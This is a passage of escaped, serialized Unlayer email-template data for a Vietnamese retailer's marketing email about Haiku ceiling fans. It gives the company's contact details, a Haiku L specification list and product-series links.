\\"},{\\\"url\\\":\\\"https:\\/\\/youtube.com\\/\\\",\\\"name\\\":\\\"YouTube\\\"},{\\\"url\\\":\\\"https:\\/\\/instagram.com\\/\\\",\\\"name\\\":\\\"Instagram\\\"},{\\\"url\\\":\\\"https:\\/\\/soundcloud.com\\/\\\",\\\"name\\\":\\\"SoundCloud\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":14,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"ozkROz9f_1\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"150%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 150%;\\\\\\\">T\\u1ed5ng \\u0111\\u00e0i b\\u00e1n h\\u00e0ng: 028.73033369<br \\/>EMAIL: <a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"mailto:sale@hogiaphat.vn\\\\\\\" target=\\\\\\\"_blank\\\\\\\">sale@hogiaphat.vn\\u00a0<\\/a><\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">-----------o0o------------<br \\/>SR Th\\u1ee7 \\u0110\\u1ee9c: 184 Tr\\u1ea7n L\\u1ef1u, An Ph\\u00fa, Tp Th\\u1ee7 \\u0110\\u1ee9c, Tp HCM<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\">SR Qu\\u1eadn 7: Happy Valley, 812 Nguy\\u1ec5n V\\u0103n Linh, T\\u00e2n Phong, Qu\\u1eadn 7, Tp HCM<br \\/>\\u00a0<br \\/>\\u00a9Hamiton Air Fans\\u2122. All Rights Reserved.<\\/p>\\\\n<p style=\\\\\\\"line-height: 150%;\\\\\\\"><strong>C\\u00d4NG TY C\\u1ed4 PH\\u1ea6N C\\u00d4NG NGH\\u1ec6 HAMILTON AIR<\\/strong><br \\/>MST: 0315778682 do s\\u1edf KH v\\u00e0 \\u0111\\u1ea7u t\\u01b0 Tp.HCM.\\u00a0<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#ffffff\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"UkkBWxvzv8\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"otIuyp2NLU\\\",\\\"contents\\\":[{\\\"id\\\":\\\"3YxPW0zruG\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_11\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">Too many emails?\\u00a0<a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"> <span style=\\\\\\\"text-decoration: underline; font-size: 14px; line-height: 19.6px;\\\\\\\">Unsubscribe<\\/span><\\/a><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#a47e6b\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Open Sans\\\",\\\"value\\\":\\\"\'Open Sans\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#236fa1\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":13}\"', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\n@media (max-width: 480px) {\\r\\n  .hide-mobile {\\r\\n    max-height: 0px;\\r\\n    overflow: hidden;\\r\\n    display: none !important;\\r\\n  }\\r\\n}\\r\\n\\r\\n<\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Cabin:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Open+Sans:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #236fa1;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #236fa1;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #236fa1;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"background-color: #236fa1;width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"background-color: #236fa1;height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:15px 10px 5px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677922239248-log_hq.png\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:0px 10px 15px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #ffffff; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\">NH\\u00c0 CUNG C\\u1ea4P \\u1ee6Y QUY\\u1ec0N CH\\u00cdNH H\\u00c3NG HAIKU - BIG ASS FANS T\\u1ea0I VI\\u1ec6T NAM<\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: transparent\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #ecf0f1;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: transparent;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-image: url(\'https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1612262724776-H.png\');background-repeat: no-repeat;background-position: center top;background-color: #ecf0f1;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      \\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1678340400926-haiku_head.jpg\\\" alt=\\\"\\\" title=\\\"\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 100%;max-width: 580px;\\\" width=\\\"580\\\"\\/>\\r\\n      \\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:25px 10px 10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #a47e6b; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"font-size: 14px; line-height: 140%;\\\"><span style=\\\"font-family: Cabin, sans-serif; line-height: 28px; font-size: 20px;\\\"><span style=\\\"line-height: 28px;\\\">\\\"Haiku L mang \\u0111\\u1ebfn s\\u1ef1 tho\\u1ea3i m\\u00e1i v\\u1edbi s\\u1ef1 ho\\u00e0n h\\u1ea3o s\\u1ef1 im l\\u1eb7ng v\\u00e0 m\\u1ed9t ki\\u1ec3u d\\u00e1ng \\u0111\\u1eb9p, thi\\u1ebft k\\u1ebf c\\u1ed5 \\u0111i\\u1ec3n.\\\"<\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div style=\\\"color: #292828; line-height: 140%; text-align: center; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ B\\u1ea3o h\\u00e0nh: 03 n\\u0103m; \\u0111i\\u1ec1u ki\\u1ec7n l\\u1eafp \\u0111\\u1eb7t trong nh\\u00e0 BH 05 n\\u0103m<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ Di\\u1ec7n t\\u00edch l\\u00e0m m\\u00e1t: 52-inch: 15\\u2019 x 15\\u2019<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa: \\u0111i k\\u00e8m, tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111i\\u1ec1u khi\\u1ec3n g\\u1eafn t\\u01b0\\u1eddng<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ T\\u1ed1c \\u0111\\u1ed9: 7 c\\u1ea5p<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ B\\u1ed9 \\u0111\\u00e8n: tu\\u1ef3 ch\\u1ecdn th\\u00eam \\u0111\\u00e8n LED 16 dimmable<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%; text-align: left;\\\"><span style=\\\"font-family: inherit; line-height: 19.6px;\\\">+ M\\u00f3c treo qu\\u1ea1t: Universal, l\\u1eafp \\u0111\\u1eb7t tr\\u1ea7n nghi\\u00eang 33 \\u0111\\u1ed9<\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\">* <span style=\\\"font-size: 8px; line-height: 11.2px;\\\">HAIKU L ch\\u01b0a bao g\\u1ed3m M\\u00f4-\\u0111un Wi-Fi \\u0111\\u1ec3 k\\u1ebft n\\u1ed1i \\u0111i\\u1ec1u khi\\u1ec3n APP (iOS\\/Android). H\\u00e3y li\\u00ean h\\u1ec7 b\\u00e1n h\\u00e0ng \\u0111\\u1ec3 t\\u01b0 v\\u1ea5n th\\u00eam<\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Open Sans\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:10px;font-family:\'Open Sans\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<div class=\\\"menu\\\" style=\\\"text-align:center\\\">\\r\\n<!--[if (mso)|(IE)]><table role=\\\"presentation\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" align=\\\"center\\\"><tr><![endif]-->\\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku Indoor\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 15px;display:inline-block;color:#444444;font-family:\'Lato\',sans-serif;font-size:14px;\\\" class=\\\"hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-ngoai-troi\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku Outdoor\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 15px;display:inline-block;color:#444444;font-family:\'Lato\',sans-serif;font-size:14px;\\\" class=\\\"hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-i\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku I series\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n    <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n    <span style=\\\"padding:5px 15px;display:inline-block;color:#444444;font-family:\'Lato\',sans-serif;font-size:14px;\\\" class=\\\"hide-mobile\\\">\\r\\n      |\\r\\n    <\\/span>\\r\\n    <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n  <!--[if (mso)|(IE)]><td style=\\\"padding:5px 15px\\\"><![endif]-->\\r\\n  \\r\\n    <a href=\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-l\\\" target=\\\"_self\\\" style=\\\"padding:5px 15px;display:inline-block;color:#0068A5;font-family:\'Lato\',sans-serif;font-size:14px;text-decoration:none\\\" >\\r\\n      Haiku L Series\\r\\n    <\\/a>\\r\\n  \\r\\n  <!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n  \\r\\n\\r\\n<!--[if 